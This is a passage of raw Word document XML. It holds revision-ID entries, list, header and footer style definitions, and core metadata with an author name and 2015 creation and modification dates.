    <w:rsid w:val="00D71472"/>
    <w:rsid w:val="00DA4C9C"/>
    <w:rsid w:val="00DF20E2"/>
    <w:rsid w:val="00E138B6"/>
    <w:rsid w:val="00E43CFA"/>
    <w:rsid w:val="00E5110E"/>
    <w:rsid w:val="00E5743C"/>
    <w:rsid w:val="00E64411"/>
    <w:rsid w:val="00EA3294"/>
    <w:rsid w:val="00EB3503"/>
    <w:rsid w:val="00EE3D90"/>
    <w:rsid w:val="00F179BC"/>
    <w:rsid w:val="00F17A48"/>
    <w:rsid w:val="00FC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32CFA9-E0F8-4D2B-8870-0907ACEF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9D1"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E7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01D"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000E7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AD1B-C004-47A6-B566-A47B90D7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6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maryjoyce</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-11-18T23:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-11-19T04:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>